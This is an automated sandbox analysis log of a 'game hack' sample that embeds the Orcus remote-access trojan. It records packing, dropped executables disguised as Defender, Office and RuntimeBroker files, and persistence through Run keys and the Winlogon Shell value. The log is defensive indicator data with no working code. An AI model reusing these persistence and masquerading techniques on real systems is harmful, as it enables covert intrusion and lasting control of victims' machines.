                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDirectory created: C:\Program Files\Microsoft\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDirectory created: C:\Program Files\Microsoft\f2aefc5695405c
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeDirectory created: C:\Program Files\Windows Portable Devices\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeDirectory created: C:\Program Files\Windows Portable Devices\f2aefc5695405c
                      Source: GameHackBuild1.exe.bin.exeStatic file information: File size 9469375 > 1048576
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GameHackBuild1.exe.bin.exe
                      Source: Binary string: q$costura.orcus.staticcommands.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb8 source: MpDefenderProtector.exe, 00000007.00000002.1323937386.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdbL source: RegAsm.exe, 00000012.00000002.2519892872.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2540236748.0000000005E90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdb source: RegAsm.exe, 00000012.00000002.2539787539.0000000005E60000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.fluentcommandlineparser.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: orcus.plugins;costura.orcus.plugins.dll.zip;costura.orcus.plugins.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.shared.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Shared.Utilities\obj\Release\Orcus.Shared.Utilities.pdb source: MpDefenderProtector.exe, 00000007.00000002.1339235069.00000000058A0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q'costura.fluentcommandlineparser.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb source: MpDefenderProtector.exe, 00000007.00000002.1323937386.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: costura.orcus.staticcommands.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: directoryinfoex?costura.directoryinfoex.dll.zip?costura.directoryinfoex.pdb.zipUes.microsoft.win32.taskscheduler.resourcesucostura.es.microsoft.win32.taskscheduler.resources.dll.zip/fluentcommandlineparserOcostura.fluentcommandlineparser.dll.zipOcostura.fluentcommandlineparser.pdb.zipUfr.microsoft.win32.taskscheduler.resourcesucostura.fr.microsoft.win32.taskscheduler.resources.dll.zip/icsharpcode.sharpziplibOcostura.icsharpcode.sharpziplib.dll.zipUit.microsoft.win32.taskscheduler.resourcesucostura.it.microsoft.win32.taskscheduler.resources.dll.zip+jetbrains.annotationsKcostura.jetbrains.annotations.dll.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.shelllibrary.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: orcus.shared9costura.orcus.shared.dll.zip9costura.orcus.shared.pdb.zip-orcus.shared.utilitiesMcostura.orcus.shared.utilities.dll.zipMcostura.orcus.shared.utilities.pdb.zip)orcus.staticcommandsIcostura.orcus.staticcommands.dll.zipIcostura.orcus.staticcommands.pdb.zip%sharpdx.direct3d11Ecostura.sharpdx.direct3d11.dll.zip#sharpdx.direct3d9Ccostura.sharpdx.direct3d9.dll.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdb source: RegAsm.exe, 00000012.00000002.2519892872.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2540236748.0000000005E90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.directoryinfoex.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q&costura.orcus.shared.utilities.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: opuswrapper7costura.opuswrapper.dll.zip7costura.opuswrapper.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Shared\obj\Release\Orcus.Shared.pdb source: MpDefenderProtector.exe, 00000007.00000002.1315906643.0000000003A65000.00000004.00000800.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1335917183.0000000005270000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2071723679.000000000425D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.opuswrapper.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shelllibrary9costura.shelllibrary.dll.zip9costura.shelllibrary.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.shared.utilities.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.plugins.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeUnpacked PE file: 9.2.Solara.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW; vs .MPRESS1:ER;.MPRESS2:ER;
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\__tmp_rar_sfx_access_check_3872640
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: section name: .didat
                      Source: Solara.exe.0.drStatic PE information: section name: .MPRESS1
                      Source: Solara.exe.0.drStatic PE information: section name: .MPRESS2
                      Source: GameHack.exe.0.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1E28C push eax; ret 0_2_00A1E2AA
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1ED46 push ecx; ret 0_2_00A1ED59
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEE28C push eax; ret 8_2_00EEE2AA
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEED46 push ecx; ret 8_2_00EEED59
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00148E36 push ebp; retf 9_3_00148E37
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014602A push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_00149052 push ebp; retf 9_3_00149053
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014607C push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014607C push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014607C push dword ptr [ebx-73h]; iretd 9_3_0014606A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014607C push dword ptr [ebx-73h]; iretd 9_3_0014606A
Source: containerRuntime.exe.8.dr | Static PE information: section name: .text entropy: 7.132224051774889
Source: SSblKNNQege.exe.26.dr | Static PE information: section name: .text entropy: 7.132224051774889
Source: RuntimeBroker.exe.26.dr | Static PE information: section name: .text entropy: 7.132224051774889
Source: SSblKNNQege.exe0.26.dr | Static PE information: section name: .text entropy: 7.132224051774889
Source: SSblKNNQege.exe1.26.dr | Static PE information: section name: .text entropy: 7.132224051774889
Source: SSblKNNQege.exe2.26.dr | Static PE information: section name: .text entropy: 7.132224051774889
Source: SSblKNNQege.exe3.26.dr | Static PE information: section name: .text entropy: 7.132224051774889
Source: SSblKNNQege.exe4.26.dr | Static PE information: section name: .text entropy: 7.132224051774889
Source: SSblKNNQege.exe5.26.dr | Static PE information: section name: .text entropy: 7.132224051774889
Source: RuntimeBroker.exe0.26.dr | Static PE information: section name: .text entropy: 7.132224051774889

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\BpJZMyRc.log
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\ErvIhhWY.log
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Program Files (x86)\MSBuild\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\syFrxmlp.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | File created: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\wowiEjmi.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\QLuoYXmy.log
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | File created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\mOMkzqHG.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\jdhUscxN.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Windows\Cursors\OfficeClickToRun.exe
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Recovery\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\brpMezGb.log
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Users\Default\Pictures\RuntimeBroker.exe
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Program Files\Microsoft\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\PxMOoBdB.log
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | File created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Program Files\Windows Portable Devices\SSblKNNQege.exe
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | File created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Windows\security\database\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Program Files (x86)\Microsoft Office\SSblKNNQege.exe
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | File created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | File created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Windows\L2Schemas\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\Desktop\WmQvmhxk.log
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\ProgramData\WindowsHolographicDevices\SSblKNNQege.exe

Boot Survival

Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
